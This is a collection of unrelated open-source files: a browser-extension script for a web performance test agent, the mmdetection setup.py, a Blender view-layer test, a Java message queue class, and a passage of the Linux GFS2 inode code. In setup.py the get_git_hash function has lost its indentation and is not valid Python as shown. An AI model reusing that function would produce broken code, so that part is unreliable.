            details.requestHeaders.splice(i, 1);
            break;
          }
        }
        details.requestHeaders.push({'name': 'Host', 'value': overrideHosts[host]})
        details.requestHeaders.push({'name': 'x-Host', 'value': host})
      }
    }
  }
  return {requestHeaders: details.requestHeaders};
}
// Lazily install the blocking webRequest listeners; safe to call more than
// once (subsequent calls are no-ops).
var installBlockingHandler = function() {
  if (blockingWebRequest)
    return;
  blockingWebRequest = true;
  browser.webRequest.onBeforeRequest.addListener(
      blockRequest, {urls: ["<all_urls>"]}, ["blocking"]);
  browser.webRequest.onBeforeSendHeaders.addListener(
      addHeaders, {urls: ["<all_urls>"]}, ["blocking", "requestHeaders"]);
};
// Get the config from wptagent and apply it (request blocking, header
// injection, host overrides and cookie seeding) before signaling startup.
fetch(SERVER + 'config').then(function(response) {
  if (response.ok) {
    response.json().then(function(data) {
      // Request-blocking rule sets.
      if (data['block'] != undefined) {
        block = data['block'];
      }
      if (data['block_domains'] != undefined) {
        block_domains = data['block_domains'];
      }
      if (data['block_domains_except'] != undefined) {
        block_domains_except = data['block_domains_except'];
      }
      // Header injection and host-override maps.
      if (data['headers'] != undefined) {
        headers = data['headers'];
      }
      if (data['overrideHosts'] != undefined) {
        overrideHosts = data['overrideHosts'];
      }
      // Pre-seed any configured cookies before the test starts.
      if (data['cookies'] != undefined) {
        for (var i = 0; i < data['cookies'].length; i++) {
          try {
            browser.cookies.set(data['cookies'][i]);
          } catch(e) {
            // Best-effort: ignore cookies the browser refuses to set.
          }
        }
      }
      // Only install the (costly) blocking listeners when a rule needs them.
      if (block.length ||
          block_domains.length ||
          block_domains_except.length ||
          Object.keys(headers).length ||
          Object.keys(overrideHosts).length) {
        installBlockingHandler();
      }
      // Let wptagent know we started
      send_message('wptagent.started', {ts: performance.now()});
    });
  }
});
// Navigation handlers: forward each webNavigation lifecycle event (for
// http/https pages that are not requests to the agent itself) to wptagent.
['onBeforeNavigate',
 'onCommitted',
 'onDOMContentLoaded',
 'onCompleted',
 'onErrorOccurred'].forEach(function(eventName) {
  browser.webNavigation[eventName].addListener(function(details) {
    if (!details.url.startsWith(SERVER))
      send_message('webNavigation.' + eventName, details);
  }, {
    url: [{schemes: ["http", "https"]}]}
  );
});
// Request handlers
// Forward webRequest lifecycle events to wptagent, skipping requests to
// the agent's own server. Events that carry header data are registered
// with the matching extraInfoSpec so the headers are included in the
// forwarded details.
[{event: 'onBeforeRequest',   extra: null},
 {event: 'onSendHeaders',     extra: ['requestHeaders']},
 {event: 'onHeadersReceived', extra: ['responseHeaders']},
 {event: 'onResponseStarted', extra: ['responseHeaders']},
 {event: 'onBeforeRedirect',  extra: ['responseHeaders']},
 {event: 'onCompleted',       extra: ['responseHeaders']},
 {event: 'onErrorOccurred',   extra: null}].forEach(function(entry) {
  var listener = function(details) {
    if (!details.url.startsWith(SERVER))
      send_message('webRequest.' + entry.event, details);
  };
  if (entry.extra)
    browser.webRequest[entry.event].addListener(listener, {urls: ["<all_urls>"]}, entry.extra);
  else
    browser.webRequest[entry.event].addListener(listener, {urls: ["<all_urls>"]});
});
| {
"pile_set_name": "Github"
} |
import os
import platform
import subprocess
import time
from setuptools import Extension, dist, find_packages, setup
from torch.utils.cpp_extension import BuildExtension, CUDAExtension
dist.Distribution().fetch_build_eggs(['Cython', 'numpy>=1.11.1'])
import numpy as np # noqa: E402
from Cython.Build import cythonize # noqa: E402
def readme():
    """Return the contents of README.md (decoded as UTF-8)."""
    with open('README.md', encoding='utf-8') as f:
        return f.read()
# Version components; combined into SHORT_VERSION here and into the full
# version string (with the git hash appended) by write_version_py().
MAJOR = 1
MINOR = 0
PATCH = ''  # empty: no patch level for this release
SUFFIX = 'rc0'  # pre-release tag
SHORT_VERSION = '{}.{}.{}{}'.format(MAJOR, MINOR, PATCH, SUFFIX)  # e.g. '1.0.rc0'
# Path (relative to the repo root) of the generated version module.
version_file = 'mmdet/version.py'
def get_git_hash():
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH', 'HOME']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.Popen(
cmd, stdout=subprocess.PIPE, env=env).communicate()[0]
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
sha = out.strip().decode('ascii')
except OSError:
sha = 'unknown'
return sha
def get_hash():
    # Resolve a short identifier for the current source tree:
    # - inside a git checkout: the 7-char abbreviated HEAD sha,
    # - from an sdist/installed tree: the local-version part of the
    #   previously generated version file,
    # - otherwise: 'unknown'.
    if os.path.exists('.git'):
        sha = get_git_hash()[:7]
    elif os.path.exists(version_file):
        try:
            from mmdet.version import __version__
            sha = __version__.split('+')[-1]
        except ImportError:
            raise ImportError('Unable to get git version')
    else:
        sha = 'unknown'
    return sha
def write_version_py():
    """Generate mmdet/version.py embedding the build time, the full
    version (short version plus '+<git hash>') and the short version."""
    # NOTE: the template lines are written at column 0 on purpose -- they
    # become top-level statements of the generated module.
    content = """# GENERATED VERSION FILE
# TIME: {}
__version__ = '{}'
short_version = '{}'
"""
    sha = get_hash()
    VERSION = SHORT_VERSION + '+' + sha
    with open(version_file, 'w') as f:
        f.write(content.format(time.asctime(), VERSION, SHORT_VERSION))
def get_version():
    """Read ``__version__`` back from the generated version file.

    Executes the file in an isolated namespace instead of relying on
    ``exec`` mutating the function's ``locals()``, which is a CPython
    implementation detail and is not guaranteed to work elsewhere.

    Returns:
        str: the full version string, e.g. ``'1.0.rc0+abc1234'``.
    """
    namespace = {}
    with open(version_file, 'r') as f:
        # compile() with the real filename keeps tracebacks pointing at
        # the version file rather than '<string>'.
        exec(compile(f.read(), version_file, 'exec'), namespace)
    return namespace['__version__']
def make_cuda_ext(name, module, sources):
    """Build a CUDAExtension named '<module>.<name>' whose sources live
    inside the module's directory."""
    # Disable the half-precision operator overloads that clash with
    # PyTorch's own definitions when compiling with nvcc.
    nvcc_flags = [
        '-D__CUDA_NO_HALF_OPERATORS__',
        '-D__CUDA_NO_HALF_CONVERSIONS__',
        '-D__CUDA_NO_HALF2_OPERATORS__',
    ]
    module_dir = os.path.join(*module.split('.'))
    return CUDAExtension(
        name='{}.{}'.format(module, name),
        sources=[os.path.join(module_dir, src) for src in sources],
        extra_compile_args={'cxx': [], 'nvcc': nvcc_flags})
def make_cython_ext(name, module, sources):
    """Build a cythonized C++ Extension named '<module>.<name>'."""
    # MSVC does not understand these GCC-style warning flags.
    compile_args = None
    if platform.system() != 'Windows':
        compile_args = {
            'cxx': ['-Wno-unused-function', '-Wno-write-strings']
        }
    ext = Extension(
        '{}.{}'.format(module, name),
        [os.path.join(*module.split('.'), src) for src in sources],
        include_dirs=[np.get_include()],
        language='c++',
        extra_compile_args=compile_args)
    # cythonize() returns a one-element list; unpack it.
    ext, = cythonize(ext)
    return ext
def get_requirements(filename='requirements.txt'):
    """Return the lines of ``filename`` (resolved relative to this
    setup.py) with trailing newlines removed."""
    base_dir = os.path.dirname(os.path.realpath(__file__))
    with open(os.path.join(base_dir, filename), 'r') as f:
        return [line.replace('\n', '') for line in f]
if __name__ == '__main__':
    # Regenerate mmdet/version.py first so the installed package reports
    # the exact git state it was built from.
    write_version_py()
    setup(
        name='mmdet',
        version=get_version(),
        description='Open MMLab Detection Toolbox and Benchmark',
        long_description=readme(),
        author='OpenMMLab',
        author_email='[email protected]',
        keywords='computer vision, object detection',
        url='https://github.com/open-mmlab/mmdetection',
        packages=find_packages(exclude=('configs', 'tools', 'demo')),
        # Ship the pre-built native extension binaries with the package.
        package_data={'mmdet.ops': ['*/*.so']},
        classifiers=[
            'Development Status :: 4 - Beta',
            'License :: OSI Approved :: Apache Software License',
            'Operating System :: OS Independent',
            'Programming Language :: Python :: 2',
            'Programming Language :: Python :: 2.7',
            'Programming Language :: Python :: 3',
            'Programming Language :: Python :: 3.4',
            'Programming Language :: Python :: 3.5',
            'Programming Language :: Python :: 3.6',
        ],
        license='Apache License 2.0',
        setup_requires=['pytest-runner', 'cython', 'numpy'],
        tests_require=['pytest', 'xdoctest'],
        install_requires=get_requirements(),
        # Native extensions: one Cython CPU op plus the CUDA ops.
        ext_modules=[
            make_cython_ext(
                name='soft_nms_cpu',
                module='mmdet.ops.nms',
                sources=['src/soft_nms_cpu.pyx']),
            make_cuda_ext(
                name='nms_cpu',
                module='mmdet.ops.nms',
                sources=['src/nms_cpu.cpp']),
            make_cuda_ext(
                name='nms_cuda',
                module='mmdet.ops.nms',
                sources=['src/nms_cuda.cpp', 'src/nms_kernel.cu']),
            make_cuda_ext(
                name='roi_align_cuda',
                module='mmdet.ops.roi_align',
                sources=['src/roi_align_cuda.cpp', 'src/roi_align_kernel.cu']),
            make_cuda_ext(
                name='roi_pool_cuda',
                module='mmdet.ops.roi_pool',
                sources=['src/roi_pool_cuda.cpp', 'src/roi_pool_kernel.cu']),
            make_cuda_ext(
                name='deform_conv_cuda',
                module='mmdet.ops.dcn',
                sources=[
                    'src/deform_conv_cuda.cpp',
                    'src/deform_conv_cuda_kernel.cu'
                ]),
            make_cuda_ext(
                name='deform_pool_cuda',
                module='mmdet.ops.dcn',
                sources=[
                    'src/deform_pool_cuda.cpp',
                    'src/deform_pool_cuda_kernel.cu'
                ]),
            make_cuda_ext(
                name='sigmoid_focal_loss_cuda',
                module='mmdet.ops.sigmoid_focal_loss',
                sources=[
                    'src/sigmoid_focal_loss.cpp',
                    'src/sigmoid_focal_loss_cuda.cu'
                ]),
            make_cuda_ext(
                name='masked_conv2d_cuda',
                module='mmdet.ops.masked_conv',
                sources=[
                    'src/masked_conv2d_cuda.cpp', 'src/masked_conv2d_kernel.cu'
                ]),
        ],
        # BuildExtension handles nvcc/cxx flag routing for CUDAExtension.
        cmdclass={'build_ext': BuildExtension},
        zip_safe=False)
| {
"pile_set_name": "Github"
} |
# ############################################################
# Importing - Same For All Render Layer Tests
# ############################################################
import unittest
import os
import sys
from view_layer_common import *
# ############################################################
# Testing
# ############################################################
class UnitTesting(ViewLayerTesting):
    def test_visibility_empty(self):
        """
        See if the depsgraph evaluation is correct
        """
        # Shared helper from view_layer_common: adds an object of the
        # given type and verifies its evaluated visibility.
        self.do_visibility_object_add('EMPTY')
# ############################################################
# Main - Same For All Render Layer Tests
# ############################################################
if __name__ == '__main__':
    # Stash any extra CLI arguments for the test case before unittest
    # consumes sys.argv.
    UnitTesting._extra_arguments = setup_extra_arguments(__file__)
    unittest.main()
| {
"pile_set_name": "Github"
} |
package com.open.net.client.structures.message;
import java.util.LinkedList;
/**
 * author : long
 * created on : 2017/11/30
 * description : Read queue -- buffers and queues messages read from the
 * connection. ("Queen" in the identifiers is the original author's
 * spelling of "queue" and is kept because the field is public API.)
 */
public final class MessageReadQueen {

    /** Pool that allocates and recycles {@code Message} instances. */
    private final MessageBuffer mReadMessageBuffer = new MessageBuffer();

    /** The actual message queue. */
    public LinkedList<Message> mReadQueen = new LinkedList<>();

    /** Wrap the given byte range in a pooled {@code Message}. */
    public Message build(byte[] src, int offset, int length) {
        return mReadMessageBuffer.build(src, offset, length);
    }

    /** Append a message to the queue; {@code null} is ignored. */
    public void add(Message msg) {
        if (msg != null) {
            mReadQueen.add(msg);
        }
    }

    /**
     * Remove a message from the queue and return it to the buffer pool;
     * {@code null} is ignored.
     */
    public void remove(Message msg) {
        if (msg != null) {
            mReadQueen.remove(msg);
            mReadMessageBuffer.release(msg);
        }
    }
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) Sistina Software, Inc. 1997-2003 All rights reserved.
* Copyright (C) 2004-2011 Red Hat, Inc. All rights reserved.
*
* This copyrighted material is made available to anyone wishing to use,
* modify, copy, or redistribute it subject to the terms and conditions
* of the GNU General Public License version 2.
*/
#include <linux/slab.h>
#include <linux/spinlock.h>
#include <linux/completion.h>
#include <linux/buffer_head.h>
#include <linux/namei.h>
#include <linux/mm.h>
#include <linux/xattr.h>
#include <linux/posix_acl.h>
#include <linux/gfs2_ondisk.h>
#include <linux/crc32.h>
#include <linux/fiemap.h>
#include <linux/security.h>
#include <asm/uaccess.h>
#include "gfs2.h"
#include "incore.h"
#include "acl.h"
#include "bmap.h"
#include "dir.h"
#include "xattr.h"
#include "glock.h"
#include "inode.h"
#include "meta_io.h"
#include "quota.h"
#include "rgrp.h"
#include "trans.h"
#include "util.h"
#include "super.h"
#include "glops.h"
/*
 * Opaque cookie passed to iget_test()/iget_set() via ilookup5() and
 * iget5_locked().
 */
struct gfs2_skip_data {
	u64 no_addr;   /* disk address (inode number) being looked up */
	int skipped;   /* set when a matching inode was skipped (being freed) */
	int non_block; /* if set, do not wait on inodes that are being freed */
};
/*
 * iget_test - match an in-core inode by disk address
 *
 * Returns 1 on a match. When data->non_block is set, an inode that is
 * currently being torn down (I_FREEING/I_CLEAR/I_WILL_FREE) is not
 * waited for: it is reported as a non-match and data->skipped is set so
 * that a subsequent iget_set() fails with -ENOENT.
 */
static int iget_test(struct inode *inode, void *opaque)
{
	struct gfs2_inode *ip = GFS2_I(inode);
	struct gfs2_skip_data *data = opaque;

	if (ip->i_no_addr == data->no_addr) {
		if (data->non_block &&
		    inode->i_state & (I_FREEING|I_CLEAR|I_WILL_FREE)) {
			data->skipped = 1;
			return 0;
		}
		return 1;
	}
	return 0;
}
/*
 * iget_set - initialise a freshly allocated in-core inode
 *
 * Fails with -ENOENT when iget_test() skipped a freeing inode, so
 * iget5_locked() does not insert a duplicate while the old inode is
 * still being destroyed.
 */
static int iget_set(struct inode *inode, void *opaque)
{
	struct gfs2_inode *ip = GFS2_I(inode);
	struct gfs2_skip_data *data = opaque;

	if (data->skipped)
		return -ENOENT;
	inode->i_ino = (unsigned long)(data->no_addr);
	ip->i_no_addr = data->no_addr;
	return 0;
}
/*
 * gfs2_ilookup - find an existing in-core inode by disk address without
 * allocating a new one. Returns NULL when not cached.
 */
struct inode *gfs2_ilookup(struct super_block *sb, u64 no_addr, int non_block)
{
	struct gfs2_skip_data data = {
		.no_addr = no_addr,
		.skipped = 0,
		.non_block = non_block,
	};

	return ilookup5(sb, (unsigned long)no_addr, iget_test, &data);
}
/*
 * gfs2_iget - look up or allocate an in-core inode for a disk address.
 * The inode hash key is the truncated disk address.
 */
static struct inode *gfs2_iget(struct super_block *sb, u64 no_addr,
			       int non_block)
{
	struct gfs2_skip_data data = {
		.no_addr = no_addr,
		.skipped = 0,
		.non_block = non_block,
	};

	return iget5_locked(sb, (unsigned long)no_addr, iget_test, iget_set,
			    &data);
}
/**
* gfs2_set_iop - Sets inode operations
* @inode: The inode with correct i_mode filled in
*
* GFS2 lookup code fills in vfs inode contents based on info obtained
* from directory entry inside gfs2_inode_lookup().
*/
static void gfs2_set_iop(struct inode *inode)
{
struct gfs2_sbd *sdp = GFS2_SB(inode);
umode_t mode = inode->i_mode;
if (S_ISREG(mode)) {
inode->i_op = &gfs2_file_iops;
if (gfs2_localflocks(sdp))
inode->i_fop = &gfs2_file_fops_nolock;
else
inode->i_fop = &gfs2_file_fops;
} else if (S_ISDIR(mode)) {
inode->i_op = &gfs2_dir_iops;
if (gfs2_localflocks(sdp))
inode->i_fop = &gfs2_dir_fops_nolock;
else
inode->i_fop = &gfs2_dir_fops;
} else if (S_ISLNK(mode)) {
inode->i_op = &gfs2_symlink_iops;
} else {
inode->i_op = &gfs2_file_iops;
init_special_inode(inode, inode->i_mode, inode->i_rdev);
}
}
/**
 * gfs2_inode_lookup - Lookup an inode
 * @sb: The super block
 * @type: The type of the inode
 * @no_addr: The inode number
 * @no_formal_ino: The inode's "formal" (generation-qualified) number
 * @non_block: Can we block on inodes that are being freed?
 *
 * Returns: A VFS inode, or an error
 */
struct inode *gfs2_inode_lookup(struct super_block *sb, unsigned int type,
				u64 no_addr, u64 no_formal_ino, int non_block)
{
	struct inode *inode;
	struct gfs2_inode *ip;
	struct gfs2_glock *io_gl = NULL;
	int error;

	inode = gfs2_iget(sb, no_addr, non_block);
	/* NOTE(review): GFS2_I() is applied before the NULL check below;
	 * this is only safe if GFS2_I() is pure pointer arithmetic with
	 * no dereference -- confirm against its definition. */
	ip = GFS2_I(inode);

	if (!inode)
		return ERR_PTR(-ENOMEM);

	if (inode->i_state & I_NEW) {
		/* Freshly allocated in-core inode: attach its glocks and
		 * (optionally) read the dinode from disk. */
		struct gfs2_sbd *sdp = GFS2_SB(inode);
		ip->i_no_formal_ino = no_formal_ino;

		/* Inode glock: protects the inode's metadata. */
		error = gfs2_glock_get(sdp, no_addr, &gfs2_inode_glops, CREATE, &ip->i_gl);
		if (unlikely(error))
			goto fail;
		ip->i_gl->gl_object = ip;

		/* iopen glock: held SHARED for the life of the inode. */
		error = gfs2_glock_get(sdp, no_addr, &gfs2_iopen_glops, CREATE, &io_gl);
		if (unlikely(error))
			goto fail_put;

		set_bit(GIF_INVALID, &ip->i_flags);
		error = gfs2_glock_nq_init(io_gl, LM_ST_SHARED, GL_EXACT, &ip->i_iopen_gh);
		if (unlikely(error))
			goto fail_iopen;

		ip->i_iopen_gh.gh_gl->gl_object = ip;
		/* The holder keeps its own reference; drop this one. */
		gfs2_glock_put(io_gl);
		io_gl = NULL;

		if (type == DT_UNKNOWN) {
			/* Inode glock must be locked already */
			error = gfs2_inode_refresh(GFS2_I(inode));
			if (error)
				goto fail_refresh;
		} else {
			/* Caller supplied the type; defer the disk read. */
			inode->i_mode = DT2IF(type);
		}

		gfs2_set_iop(inode);
		unlock_new_inode(inode);
	}

	return inode;

fail_refresh:
	/* Drop the iopen holder without caching the glock. */
	ip->i_iopen_gh.gh_flags |= GL_NOCACHE;
	ip->i_iopen_gh.gh_gl->gl_object = NULL;
	gfs2_glock_dq_uninit(&ip->i_iopen_gh);
fail_iopen:
	if (io_gl)
		gfs2_glock_put(io_gl);
fail_put:
	ip->i_gl->gl_object = NULL;
	gfs2_glock_put(ip->i_gl);
fail:
	iget_failed(inode);
	return ERR_PTR(error);
}
/*
 * gfs2_lookup_by_inum - look up an inode by disk address, verifying the
 * block's type first (used e.g. by NFS handle decoding).
 * @no_formal_ino: if non-NULL, the expected formal inode number; used
 * for NFS stale-handle detection.
 */
struct inode *gfs2_lookup_by_inum(struct gfs2_sbd *sdp, u64 no_addr,
				  u64 *no_formal_ino, unsigned int blktype)
{
	struct super_block *sb = sdp->sd_vfs;
	struct gfs2_holder i_gh;
	struct inode *inode = NULL;
	int error;

	/* Must not read in block until block type is verified */
	error = gfs2_glock_nq_num(sdp, no_addr, &gfs2_inode_glops,
				  LM_ST_EXCLUSIVE, GL_SKIP, &i_gh);
	if (error)
		return ERR_PTR(error);

	error = gfs2_check_blk_type(sdp, no_addr, blktype);
	if (error)
		goto fail;

	inode = gfs2_inode_lookup(sb, DT_UNKNOWN, no_addr, 0, 1);
	if (IS_ERR(inode))
		goto fail;

	/* Two extra checks for NFS only */
	if (no_formal_ino) {
		/* Handle refers to an earlier generation of this inum. */
		error = -ESTALE;
		if (GFS2_I(inode)->i_no_formal_ino != *no_formal_ino)
			goto fail_iput;

		/* System files must never be reachable via NFS handles. */
		error = -EIO;
		if (GFS2_I(inode)->i_diskflags & GFS2_DIF_SYSTEM)
			goto fail_iput;

		error = 0;
	}

fail:
	gfs2_glock_dq_uninit(&i_gh);
	return error ? ERR_PTR(error) : inode;
fail_iput:
	iput(inode);
	goto fail;
}
struct inode *gfs2_lookup_simple(struct inode *dip, const char *name)
{
	struct qstr qstr;
	struct inode *inode;

	gfs2_str2qstr(&qstr, name);
	inode = gfs2_lookupi(dip, &qstr, 1);
	/* gfs2_lookupi has inconsistent callers: vfs
	 * related routines expect NULL for no entry found,
	 * gfs2_lookup_simple callers expect ENOENT
	 * and do not check for NULL.
	 */
	return inode ? inode : ERR_PTR(-ENOENT);
}
/**
 * gfs2_lookupi - Look up a filename in a directory and return its inode
 * @dir: The directory inode
 * @name: The name of the inode to look for
 * @is_root: If 1, ignore the caller's permissions
 *
 * This can be called via the VFS filldir function when NFS is doing
 * a readdirplus and the inode which it's intending to stat isn't
 * already in cache. In this case we must not take the directory glock
 * again, since the readdir call will have already taken that lock.
 *
 * Returns: The inode, NULL if the entry was not found, or an ERR_PTR
 */
struct inode *gfs2_lookupi(struct inode *dir, const struct qstr *name,
			   int is_root)
{
	struct super_block *sb = dir->i_sb;
	struct gfs2_inode *dip = GFS2_I(dir);
	struct gfs2_holder d_gh;
	int error = 0;
	struct inode *inode = NULL;
	int unlock = 0;

	if (!name->len || name->len > GFS2_FNAMESIZE)
		return ERR_PTR(-ENAMETOOLONG);

	/* "." always resolves to the directory itself; ".." does too
	 * when the directory is the filesystem root. */
	if ((name->len == 1 && memcmp(name->name, ".", 1) == 0) ||
	    (name->len == 2 && memcmp(name->name, "..", 2) == 0 &&
	     dir == d_inode(sb->s_root))) {
		igrab(dir);
		return dir;
	}

	/* Take the directory glock unless this thread already holds it
	 * (e.g. NFS readdirplus calling back into lookup). */
	if (gfs2_glock_is_locked_by_me(dip->i_gl) == NULL) {
		error = gfs2_glock_nq_init(dip->i_gl, LM_ST_SHARED, 0, &d_gh);
		if (error)
			return ERR_PTR(error);
		unlock = 1;
	}

	if (!is_root) {
		error = gfs2_permission(dir, MAY_EXEC);
		if (error)
			goto out;
	}

	inode = gfs2_dir_search(dir, name, false);
	if (IS_ERR(inode))
		error = PTR_ERR(inode);
out:
	if (unlock)
		gfs2_glock_dq_uninit(&d_gh);
	/* Missing entry is reported as NULL, not as an error pointer. */
	if (error == -ENOENT)
		return NULL;
	return inode ? inode : ERR_PTR(error);
}
/**
* create_ok - OK to create a new on-disk inode here?
* @dip: Directory in which dinode is to be created
* @name: Name of new dinode
* @mode:
*
* Returns: errno
*/
static int create_ok(struct gfs2_inode *dip, const struct qstr *name,
		     umode_t mode)
{
	int error = gfs2_permission(&dip->i_inode, MAY_WRITE | MAY_EXEC);

	if (error)
		return error;

	/* Don't create entries in an unlinked directory */
	if (!dip->i_inode.i_nlink)
		return -ENOENT;

	/* Directory entry count is saturated. */
	if (dip->i_entries == (u32)-1)
		return -EFBIG;

	/* A new subdirectory would overflow the parent's link count. */
	if (S_ISDIR(mode) && dip->i_inode.i_nlink == (u32)-1)
		return -EMLINK;

	return 0;
}
/*
 * munge_mode_uid_gid - apply ownership-inheritance rules to a new inode
 *
 * Implements the "suiddir" mount option: when the parent directory is
 * setuid and owned by a non-root user, new subdirectories inherit the
 * setuid bit, and new files created by a different user lose their
 * set-id/exec bits; in both cases the owner is inherited. Setgid
 * directories propagate group ownership (and setgid for new subdirs)
 * per the usual POSIX semantics.
 */
static void munge_mode_uid_gid(const struct gfs2_inode *dip,
			       struct inode *inode)
{
	if (GFS2_SB(&dip->i_inode)->sd_args.ar_suiddir &&
	    (dip->i_inode.i_mode & S_ISUID) &&
	    !uid_eq(dip->i_inode.i_uid, GLOBAL_ROOT_UID)) {
		if (S_ISDIR(inode->i_mode))
			inode->i_mode |= S_ISUID;
		else if (!uid_eq(dip->i_inode.i_uid, current_fsuid()))
			inode->i_mode &= ~07111;
		inode->i_uid = dip->i_inode.i_uid;
	} else
		inode->i_uid = current_fsuid();

	if (dip->i_inode.i_mode & S_ISGID) {
		if (S_ISDIR(inode->i_mode))
			inode->i_mode |= S_ISGID;
		inode->i_gid = dip->i_inode.i_gid;
	} else
		inode->i_gid = current_fsgid();
}
/*
 * alloc_dinode - allocate the on-disk block(s) for a new dinode
 * @ip: the new inode
 * @flags: allocation flags (e.g. GFS2_AF_ORLOV)
 * @dblocks: in: number of blocks wanted (dinode plus optional xattr
 *           block); out: number of blocks actually allocated
 *
 * Returns: errno
 */
static int alloc_dinode(struct gfs2_inode *ip, u32 flags, unsigned *dblocks)
{
	struct gfs2_sbd *sdp = GFS2_SB(&ip->i_inode);
	struct gfs2_alloc_parms ap = { .target = *dblocks, .aflags = flags, };
	int error;

	error = gfs2_quota_lock_check(ip, &ap);
	if (error)
		goto out;

	error = gfs2_inplace_reserve(ip, &ap);
	if (error)
		goto out_quota;

	error = gfs2_trans_begin(sdp, (*dblocks * RES_RG_BIT) + RES_STATFS + RES_QUOTA, 0);
	if (error)
		goto out_ipreserv;

	/* NOTE(review): the assignments below run even if
	 * gfs2_alloc_blocks() fails; callers must then rely solely on
	 * the returned error -- confirm this is intentional. */
	error = gfs2_alloc_blocks(ip, &ip->i_no_addr, dblocks, 1, &ip->i_generation);
	ip->i_no_formal_ino = ip->i_generation;
	ip->i_inode.i_ino = ip->i_no_addr;
	ip->i_goal = ip->i_no_addr; /* start future allocations here */

	gfs2_trans_end(sdp);

out_ipreserv:
	gfs2_inplace_release(ip);
out_quota:
	gfs2_quota_unlock(ip);
out:
	return error;
}
/*
 * gfs2_init_dir - write the "." and ".." entries into a new directory's
 * dinode block.
 */
static void gfs2_init_dir(struct buffer_head *dibh,
			  const struct gfs2_inode *parent)
{
	struct gfs2_dinode *di = (struct gfs2_dinode *)dibh->b_data;
	struct gfs2_dirent *dent = (struct gfs2_dirent *)(di+1);

	/* "." points at the new directory itself. */
	gfs2_qstr2dirent(&gfs2_qdot, GFS2_DIRENT_SIZE(gfs2_qdot.len), dent);
	dent->de_inum = di->di_num; /* already GFS2 endian */
	dent->de_type = cpu_to_be16(DT_DIR);

	/* ".." consumes the rest of the block and points at the parent. */
	dent = (struct gfs2_dirent *)((char*)dent + GFS2_DIRENT_SIZE(1));
	gfs2_qstr2dirent(&gfs2_qdotdot, dibh->b_size - GFS2_DIRENT_SIZE(1) - sizeof(struct gfs2_dinode), dent);
	gfs2_inum_out(parent, dent);
	dent->de_type = cpu_to_be16(DT_DIR);
}
/**
* gfs2_init_xattr - Initialise an xattr block for a new inode
* @ip: The inode in question
*
* This sets up an empty xattr block for a new inode, ready to
* take any ACLs, LSM xattrs, etc.
*/
static void gfs2_init_xattr(struct gfs2_inode *ip)
{
	struct gfs2_sbd *sdp = GFS2_SB(&ip->i_inode);
	struct buffer_head *bh;
	struct gfs2_ea_header *ea;

	bh = gfs2_meta_new(ip->i_gl, ip->i_eattr);
	gfs2_trans_add_meta(ip->i_gl, bh);
	gfs2_metatype_set(bh, GFS2_METATYPE_EA, GFS2_FORMAT_EA);
	gfs2_buffer_clear_tail(bh, sizeof(struct gfs2_meta_header));

	/* One unused record spanning the whole journaled block size. */
	ea = GFS2_EA_BH2FIRST(bh);
	ea->ea_rec_len = cpu_to_be32(sdp->sd_jbsize);
	ea->ea_type = GFS2_EATYPE_UNUSED;
	ea->ea_flags = GFS2_EAFLAG_LAST;

	brelse(bh);
}
/**
* init_dinode - Fill in a new dinode structure
* @dip: The directory this inode is being created in
* @ip: The inode
* @symname: The symlink destination (if a symlink)
* @bhp: The buffer head (returned to caller)
*
*/
static void init_dinode(struct gfs2_inode *dip, struct gfs2_inode *ip,
			const char *symname)
{
	struct gfs2_dinode *di;
	struct buffer_head *dibh;

	dibh = gfs2_meta_new(ip->i_gl, ip->i_no_addr);
	gfs2_trans_add_meta(ip->i_gl, dibh);
	di = (struct gfs2_dinode *)dibh->b_data;
	gfs2_dinode_out(ip, di);

	di->di_major = cpu_to_be32(MAJOR(ip->i_inode.i_rdev));
	di->di_minor = cpu_to_be32(MINOR(ip->i_inode.i_rdev));
	/* Zero every padding/reserved field of the on-disk structure. */
	di->__pad1 = 0;
	di->__pad2 = 0;
	di->__pad3 = 0;
	memset(&di->__pad4, 0, sizeof(di->__pad4));
	memset(&di->di_reserved, 0, sizeof(di->di_reserved));
	gfs2_buffer_clear_tail(dibh, sizeof(struct gfs2_dinode));

	switch(ip->i_inode.i_mode & S_IFMT) {
	case S_IFDIR:
		/* New directories get "." and ".." stored inline. */
		gfs2_init_dir(dibh, dip);
		break;
	case S_IFLNK:
		/* Symlink target is stored inline after the header. */
		memcpy(dibh->b_data + sizeof(struct gfs2_dinode), symname, ip->i_inode.i_size);
		break;
	}

	set_buffer_uptodate(dibh);
	brelse(dibh);
}
/**
 * gfs2_trans_da_blks - Calculate number of blocks to link inode
 * @dip: The directory we are linking into
 * @da: The dir add information
 * @nr_inodes: The number of inodes involved
 *
 * This calculates the number of blocks we need to reserve in a
 * transaction to link @nr_inodes into a directory. In most cases
 * @nr_inodes will be 2 (the directory plus the inode being linked in)
 * but in case of rename, 4 may be required.
 *
 * Returns: Number of blocks
 */
static unsigned gfs2_trans_da_blks(const struct gfs2_inode *dip,
				   const struct gfs2_diradd *da,
				   unsigned nr_inodes)
{
	/* New directory blocks, plus their rgrp bitmap blocks, plus the
	 * dinodes touched, plus quota and statfs change blocks. */
	unsigned blks = da->nr_blocks;

	blks += gfs2_rg_blocks(dip, da->nr_blocks);
	blks += nr_inodes * RES_DINODE;
	blks += RES_QUOTA + RES_STATFS;
	return blks;
}
/*
 * link_dinode - add a directory entry for a freshly created inode
 * @dip: the parent directory
 * @name: the entry name
 * @ip: the new inode
 * @da: directory-add state from gfs2_diradd_alloc_required()
 *
 * Reserves quota and resource-group space when the directory has to
 * grow, then adds the entry inside a transaction.
 *
 * Returns: errno
 */
static int link_dinode(struct gfs2_inode *dip, const struct qstr *name,
		       struct gfs2_inode *ip, struct gfs2_diradd *da)
{
	struct gfs2_sbd *sdp = GFS2_SB(&dip->i_inode);
	struct gfs2_alloc_parms ap = { .target = da->nr_blocks, };
	int error;

	if (da->nr_blocks) {
		/* Directory must grow: reserve quota and rgrp space. */
		error = gfs2_quota_lock_check(dip, &ap);
		if (error)
			goto fail_quota_locks;

		error = gfs2_inplace_reserve(dip, &ap);
		if (error)
			goto fail_quota_locks;

		error = gfs2_trans_begin(sdp, gfs2_trans_da_blks(dip, da, 2), 0);
		if (error)
			goto fail_ipreserv;
	} else {
		/* Entry fits into the existing directory blocks. */
		error = gfs2_trans_begin(sdp, RES_LEAF + 2 * RES_DINODE, 0);
